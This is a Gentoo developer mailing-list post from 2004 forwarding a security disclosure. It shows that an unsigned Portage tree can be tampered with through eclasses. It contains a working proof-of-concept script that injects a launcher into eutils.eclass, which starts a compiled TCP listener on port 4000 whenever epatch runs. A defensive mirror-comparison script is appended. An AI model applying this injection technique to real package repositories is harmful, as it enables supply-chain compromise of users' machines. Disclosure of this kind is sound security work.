Gentoo Archives: gentoo-dev

From: Joshua Brindle <method@g.o>
To: gentoo-dev@l.g.o, gentoo-core@××××××××××××.org
Subject: [gentoo-dev] [Fwd: [gentoo-security] Trojan for Gentoo, part 2]
Date: Sat, 06 Nov 2004 20:56:32
Message-Id: 418D3A80.8020504@gentoo.org
perhaps some motivation for portage devs....

-------- Original Message --------
Subject: [gentoo-security] Trojan for Gentoo, part 2
Date: Sat, 06 Nov 2004 21:16:11 +0100
From: Alexander Holler <holler@××××××××××.de>
To: gentoo-security@l.g.o

Hi,

after 1.5 years (2 years after the bug could be found in bugzilla) it
seems that one of the highest security risks is closed. At least I've
seen something about signed ebuilds. (see
http://marc.theaimsgroup.com/?l=gentoo-security&m=104816199500974&w=2 ).

Time for the next part. I've already written a bug for that a year ago,
but it was now closed a second time by "the ... gatekeeper".

See bug #26110

Here's the next small script. If you are operating a gentoo mirror, or
have access to one, feel free to play with it.

If you are a user, the only practical way to ensure a minimum of
security is to sync twice:
(a) sync,
(b) delete timestamp,
(c) sync with other mirror and
(d) look if no files were different, otherwise restart with (a)

----------------gentooTrojan.sh---------------------------
#!/bin/sh
if [ ${#} -ne 1 ] ; then
    echo "This script puts a silly trojan into Gentoo's portage."
    echo "Usage: `basename ${0}` PathToPortage"
    exit 1
fi

mv ${1}/eclass/eutils.eclass ${1}/eclass/eutils-without-trojan.eclass
sed -e 's:^epatch().*{:epatch() {\newarn "Starting Trojan.\nTry it with
telnet localhost 4000.\nKill it with killall
GentooTrojan."\n${PORTDIR}/eclass/GentooTrojan \&\n:'
<${1}/eclass/eutils-without-trojan.eclass >${1}/eclass/eutils.eclass
cat >${1}/eclass/GentooTrojan.c << EOF
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <string.h>

int main(void)
{
    struct sockaddr_in serv;
    struct sockaddr_in cli;
    int sock;
    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sock < 0)
        return 1;
    bzero((char *) &serv, sizeof(serv));
    serv.sin_family = AF_INET;
    serv.sin_addr.s_addr = htonl(INADDR_ANY);
    serv.sin_port = htons(4000);
    if (bind(sock, (struct sockaddr *) &serv, sizeof(serv)) < 0)
        return 1;
    if (listen(sock, 5) < 0)
        return 1;
    while (1) {
        int scli;
        int slen;
        static char *str="Your are listing to the famous Gentoo trojan!\n";
        slen = sizeof(cli);
        scli = accept(sock, (struct sockaddr *) &cli,
                      (socklen_t *) &slen);
        write(scli, str, strlen(str));
        close(scli);
    }
}
EOF

gcc -o ${1}/eclass/GentooTrojan ${1}/eclass/GentooTrojan.c

echo "Done. Portage successful infected with a trojan."
echo "Just emerge an ebuild which uses epatch and do a"
echo " telnet localhost 4000"
echo "afterwards."
-------------------------------------------

Kind regards,

Alexander Holler


PS: Please don't reply to me, I don't read any Gentoo mailing lists
anymore, in fact I even don't know why I'm writing this message, as I
already have lost every interest in Gentoo some time ago.

PPS: Sorry for those hard words, but that all reminds me of Microsoft.
The "eclass-hell" is as bad as the "dll-hell" and some bugs are getting
forgotten, ignored or fixed in the same time.

PPPS: I really appreciate all the very good work on hardened gcc,
selinux-profiles and so on, but for me, this all seems useless as long
as the base is compromised that easily and the user has no practical way
(e.g. hashes) to check what he gets on his machine with a 'sync'.

--
gentoo-security@g.o mailing list

--
gentoo-dev@g.o mailing list
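
Steps (a) to (d) of the forwarded message, written as a check a user could script: hash every file in two copies of the tree synced from different mirrors and list the paths that disagree. This is an added example, not part of the original message or of Portage; the function names, the constructed sample trees and the exclusion of metadata/timestamp* are assumptions.

```shell
#!/bin/sh
# Added example (not from the original message): compare two copies of the
# Portage tree, each synced from a different mirror, by SHA-256 of every file.

# tree_manifest DIR: print "hash  ./path" for each regular file under DIR.
# Assumption: metadata/timestamp* are the only files expected to differ.
tree_manifest() {
    ( cd "$1" && find . -type f ! -path './metadata/timestamp*' \
          -exec sha256sum {} + | LC_ALL=C sort )
}

# compare_trees A B: print each path that is changed, missing or extra.
# Returns 0 if the trees match, 1 if they differ, 2 on a usage error.
compare_trees() {
    [ -d "$1" ] && [ -d "$2" ] || return 2
    ma=$(mktemp) && mb=$(mktemp) || return 2
    tree_manifest "$1" >"$ma"
    tree_manifest "$2" >"$mb"
    # comm -3 keeps the manifest lines that occur in only one tree.
    diffs=$(LC_ALL=C comm -3 "$ma" "$mb" \
        | sed 's/^[[:space:]]*[0-9a-f]\{64\}  //' | LC_ALL=C sort -u)
    rm -f "$ma" "$mb"
    if [ -n "$diffs" ]; then
        printf '%s\n' "$diffs"
        return 1
    fi
    return 0
}

# make_sample: build two constructed trees (stand-ins for two mirrors) in a
# temp dir and print its path; mirror2 has one altered and one extra file.
make_sample() {
    d=$(mktemp -d) || return 2
    for m in mirror1 mirror2; do
        mkdir -p "$d/$m/eclass" "$d/$m/metadata"
        printf 'epatch() {\n}\n' >"$d/$m/eclass/eutils.eclass"
        echo "synced from $m" >"$d/$m/metadata/timestamp.chk"
    done
    echo '# line added on one mirror only' >>"$d/mirror2/eclass/eutils.eclass"
    echo 'constructed' >"$d/mirror2/eclass/unexpected-file"
    echo "$d"
}

# Stand-alone use: sh compare-trees.sh /path/to/treeA /path/to/treeB
if [ "$#" -eq 2 ]; then
    compare_trees "$1" "$2"
    exit $?
fi
```

A reported path means the two mirrors served different content for it; it does not say which copy is the altered one.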

Replies

Subject Author
Re: [gentoo-dev] [Fwd: [gentoo-security] Trojan for Gentoo, part 2] Ioannis Aslanidis <aslanidis@×××××.com>